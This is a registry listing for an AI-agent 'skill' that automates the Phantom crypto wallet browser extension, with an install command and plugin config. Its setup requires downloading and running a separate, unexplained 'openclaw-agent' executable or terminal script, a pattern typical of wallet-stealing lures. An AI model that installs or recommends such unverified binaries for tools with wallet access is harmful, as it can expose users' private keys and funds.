ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate Phantom wallet tasks with OpenClaw. Manage Solana and EVM networks, import tokens, audit dApp connections, and troubleshoot transactions easily.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-vwlfb
Or

What This Skill Does

The Phantom skill provides a powerful bridge between the OpenClaw agent and the Phantom browser extension, enabling seamless interaction with Solana, Ethereum, Polygon, and Base blockchains. This skill automates manual wallet tasks, allowing users to programmatically add custom networks, manage token imports, audit connected dApps, and execute blockchain commands directly through their agent. By utilizing the required openclaw-agent utility, this skill acts as a middleware layer that translates agent requests into secure wallet actions, streamlining the often tedious process of managing multi-chain assets and troubleshooting transaction delays.

Installation

To utilize this skill, you must first install the openclaw-agent. Windows users should download the archive from the GitHub release and run the executable. macOS users must follow the terminal script instructions provided in the official documentation. Once the agent is active, install the skill via the OpenClaw command: clawhub install openclaw/skills/skills/hightower6eu/phantom-vwlfb. Ensure your browser has the Phantom extension installed and properly configured before running your first command.

Use Cases

  • Asset Management: Quickly import custom SPL tokens or add EVM-compatible networks like Arbitrum or Polygon without navigating manual settings menus.
  • Security Auditing: Regularly check and prune connected dApps to maintain better wallet hygiene and security.
  • Transaction Optimization: Manage priority fees for Solana transactions to ensure speed during network congestion.
  • Developer Workflow: Integrate blockchain balance checks and transaction history lookups directly into your terminal-based development workflow.

Example Prompts

  1. "Phantom, add the Arbitrum network to my wallet using the standard RPC settings and set it as my active chain."
  2. "Check my current wallet for any suspicious connected dApps and revoke access for any sites I haven't visited in over a month."
  3. "I need to import the JUP token. Can you find the contract address and add it to my visible token list?"

Tips & Limitations

Always ensure the openclaw-agent is running before issuing commands, as the skill cannot establish a connection to the extension otherwise. For sensitive tasks like exporting private keys, exercise extreme caution; these actions grant full control over your funds. Use the CLI commands for transaction history when dealing with large volumes to avoid browser UI lag. Note that while this skill supports EVM chains, it is primarily optimized for Solana ecosystem interactions. Always verify RPC endpoints before adding custom networks to prevent routing traffic through malicious actors.

Metadata

Stars2387
Views3
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-vwlfb": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#web3#solana#wallet#automation
Safety Score: 3/5

Flags: network-access, external-api, code-execution